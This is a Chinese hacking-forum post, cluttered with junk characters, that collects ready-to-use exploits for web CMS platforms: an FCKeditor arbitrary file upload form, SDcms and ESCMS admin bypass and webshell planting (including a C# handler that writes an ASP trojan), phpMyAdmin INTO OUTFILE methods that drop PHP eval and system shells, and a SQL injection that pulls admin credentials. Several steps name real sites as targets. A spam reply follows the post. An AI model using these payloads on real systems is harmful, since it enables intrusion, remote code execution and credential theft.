8 {/ o* S, ~* ]$ L$ ?( i% z/ F1 }& A如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件  f. a5 I5 K3 L/ V' c
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">+ F% Z/ M# G6 c$ e' V- l4 L
Upload a new file:<br>
/ s6 r$ D/ a, S; s0 M  H: @' S<input type="file" name="NewFile" size="50"><br>% B1 ?0 ?# {& W# q1 b
<input id="btnUpload" type="submit" value="Upload">/ u2 q4 b1 C5 _1 A
</form>  o9 ~; A& w" f3 Q4 V
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) w* c: r  J8 x/ R2 F4 _- D% n: Y. q5 j4 g" ^$ \
SDcms 后台拿webshell
3 G; A" @( K# C( {& o9 ?  u( z- C1 c: N
第一种方法:
( s) [- ?' c0 `8 }' f进入后台-->系统管理-->系统设置-->系统设置->网站名称;
7 _# i6 a% ~' B, G: M把网站名称内容修改为   "%><%eval request("xxx")'    //密码为xxx
/ a! ^8 @* k" c# @, w用菜刀链接http://www.xxx.com/inc/const.asp  就搞定了。
* h( q' X  Y, [! [第二种方法:
: C4 f  p6 Z4 d1 n# r# A  a, M进入后台-->系统管理-->系统设置-->系统设置->上传设置;* P. c! S$ n% R9 h( ^/ Y4 b9 J1 A- B
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!& D2 h: m# j  v+ _4 k& ^7 P
第三种方法:
! ]& g) C. E" q* ~3 ~- |/ _进入后台-->界面管理-->模板文件管理-->创建文件
4 H. y3 F( f" R5 b! M+ n! T文件名写入getshell.ashx
* g1 H* F1 q. N内容写入下面内容:
+ M9 X0 q8 a9 F- P+ O" ?/====================复制下面的=========================/( x3 m" o$ X5 y* f4 W  b: K1 {# g- H
<%@ WebHandler Language="C#" Class="Handler" %>, _; s% h- k6 a7 Y
using System;
- k  @3 p- w5 s" V1 A& xusing System.Web;! x& k' f  I; {1 e
using System.IO;6 o* a8 [6 W% C+ H
public class Handler : IHttpHandler {
1 j7 V) Z+ b* g; ?public void ProcessRequest (HttpContext context) {
* J1 |" V* @1 o9 i: q: Econtext.Response.ContentType = "text/plain";7 c1 U6 I5 w2 }- C  d) H
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
9 s7 i' M! s, ^! tfile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");- c! l8 n( Y0 ]
file1.Flush();2 c- ?7 d- t7 e( |: @9 \" h; U& l
file1.Close();
$ ?& X( J. b9 X1 I9 d8 F6 {}
+ w# `+ F/ j+ \* b1 j  L/ q2 }2 w2 @public bool IsReusable {
8 H, @$ P) U7 m( ^get {+ o6 ]' `6 T6 a9 W. c( Y
return false;
1 y" @5 Q( o! D+ L: V}
2 S; E! n* Y3 k. q$ A}
1 q7 D/ s# A) h# b% S}
/ B* B- W# F" z0 ]/=============================================/% Z  }7 [/ Q$ a
访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx3 P5 }: l1 f: W. ^, g' H; {) k4 Q
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接& A/ c: a/ q% P. F! w1 Q; S# A3 c, ^
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------2 l4 C& y% W7 D7 s" r
. U* {. P+ r% N/ x1 \, \0 z" F
ESCMS网站管理系统0day
% a. v: J1 J" ^4 n% c( W" T; v5 H- t# l' v* g
后台登陆验证是通过admin/check.asp实现的* z) }5 L7 Z+ h! @
' d5 v/ T2 g( Z6 ]' q
首先我们打开http://target.com/admin/es_index.html
7 _0 D8 D0 P* B- V然后在COOKIE结尾加上8 H0 W4 }* C7 B3 ^$ y+ S
; ESCMS$_SP2=ES_admin=st0p;0 V, W( [5 m3 Q+ Y% j6 I$ R3 [" @
修改,然后刷新
, V" t/ G1 H5 W: d: p) {9 }& S3 g进后台了嘎..2 X8 k# J8 V/ k+ ^/ [7 X' q% v$ G5 U
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
# W. b- C8 J5 S9 P6 ~* L  Q$ m1 [3 w+ a& m: `
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
3 m9 p& f" J# s嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
, U% w8 n# N1 h& `8 t; ]存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
9 u' Y" Y: G0 h, ^) D. E在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了. T! \1 i' _1 l: V  }( n( I% l" c  Z
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; Q, }5 X6 @% \+ W4 E' q6 n4 `& T) S, A; o/ |. i" R% {
宁志网站管理系统后台无验证漏洞及修复
$ r+ k0 H; k: w  C2 ^
: P8 ]! K; J/ o5 P. E4 k3 g" L网上搜了一下,好像没有发布.如有雷同纯粹巧合!
: o1 @4 q# g$ Y, e4 I* G官方网站:www.ningzhi.net
8 D* t9 @" L6 T" ^6 S学校网站管理系统 V.2011版本 - |, I# r' G* S: N3 j
http://down.chinaz.com/soft/29943.htm * B( c# ~$ T6 M9 O: I
其它版本(如:政府版等),自行下载.
) E6 Z: N- [) G  Q1 o漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
) L4 {' _, n4 s, n4 V& W; p* n! ulogin.asp代码如下:
9 m5 V5 ^/ v8 G0 z8 c: c2 m<%  response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> , V; z' ]4 Y8 _" @+ s
manage.asp代码我就不帖出来了.反正也没验证.
$ z  B# Q* W: a* }只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
# r% A; B0 l1 j0 {3 n- z漏洞利用:
) L0 K, m% O/ C8 u7 y, _; W直接访问http://www.0855.tv/admin/manage.asp
' q& V. f0 H. G  n数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5: [, t0 @5 ?) _- r0 f3 |4 u/ |0 D
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------9 p, r" u, x; I3 y7 L3 A
" X7 r; J& Y2 E; O6 X
phpmyadmin拿shell的四种方法总结及修复
; C& `/ I# y1 `; N! z, B3 ?# T1 G: s" @/ c2 J! P; {
方法一:1 E/ o7 Z* E& @" @' s& N$ C( W
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
& }! G/ X* S5 g* }$ c( @INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
& l7 U2 `& @# u$ m& P* m7 USELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
# U3 Z/ s- c* M% P) {----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php5 q4 B0 p; ]+ D! o2 F
    一句话连接密码:7on
2 p& [# r- V* a* V, t# G: {# G: E% l  f方法二:8 w0 h5 q* p) e5 T+ h3 ]
读取文件内容:    select load_file('E:/xamp/www/s.php');! Q2 h8 g% M/ ]& J& q9 s8 }. N
写一句话:    select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'( e) X9 o0 i: k' V+ Z5 A6 D1 I
cmd执行权限:    select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
1 n4 y, e9 j" W" D( u* i方法三:
, w+ C. }5 h$ O  o$ a. G' K4 }JhackJ版本 PHPmyadmin拿shell
5 a7 p1 c$ e: f4 i& v3 Q# BCreate TABLE study (cmd text NOT NULL);
- P  k" Z- |1 r' J% pInsert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');0 R0 r9 ?$ F  k% d3 u
select cmd from study into outfile 'E:/wamp/www/7.php';1 V# `, z6 v; f
Drop TABLE IF EXISTS study;
+ t$ V( E- f) ]4 ~9 |<?php eval($_POST[cmd])?>
0 D' X2 F3 R, c& u% a  T  QCREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
8 ]$ j- w8 i9 v- ]3 m3 v7 BINSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 10 f( v' q9 q8 T) }: h
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 18 T% o: z& W6 c: [0 ^
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
5 \5 k/ ~! q$ P1 a' s' _9 O方法四:  _+ W9 m/ D" n2 V
select load_file('E:/xamp/www/study.php');" V8 x5 k6 e, u+ \7 @
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
& ]4 L/ ~. N' K2 \4 u% J4 w, x然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
3 t+ J. }" ~" Z-----------------------------------------------------------------------------------------------------------------------------------------------------------------------, W0 [+ K; o" x% C

; U1 A  ~& `+ K1 P) a3 yNO.001中学网站管理系统 Build 110628 注入漏洞, |' i% `' E1 ^% Y6 S2 t
9 T6 O: n) b7 c2 f+ [- g. d: c
NO.001中学网站管理系统功能模块:2 X% y- L. T! c. P) E
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等8 s0 |$ l$ {( h5 f  p, Z" Y1 x( R
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
  u4 c3 |; f9 z- K3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息2 N# K6 Z8 C9 k
4.视频图片管理:一级分类,动态添加视频或者图片等信息
* o* F. S2 Y& h/ R, x5.留言管理:对留言,修改,删除、回复等管理6 \% w% ]  o2 z! k) \
6.校友频道:包括校友资料excel导出、管理等功能
% t) Q( M$ R6 c2 [0 q: F7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页1 {9 Z. u5 u# O- \. N+ W1 G
默认后台:admin/login.asp
- n- {8 @3 {" }/ o9 A! a官方演示:http://demo.001cms.net
* O6 x5 S* n/ @+ N, R源码下载地址:http://down.chinaz.com/soft/30187.htm
% L* {$ ~2 n, Z3 h) dEXP:
8 f" R4 `" K9 w  y! P) ?union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
) e( o8 @( ~4 [- ], o测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
3 z3 ]6 B% {5 {3 Z& mgetshell:后台有备份,你懂的
% _, e1 j; E0 R; e* }$ P" O另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
( s5 N/ o/ s: y-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
回复

使用道具 举报

沙发
匿名  发表于 2017-10-28 08:21:04
casino slots
online casino canada
new online casino
slot machines
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表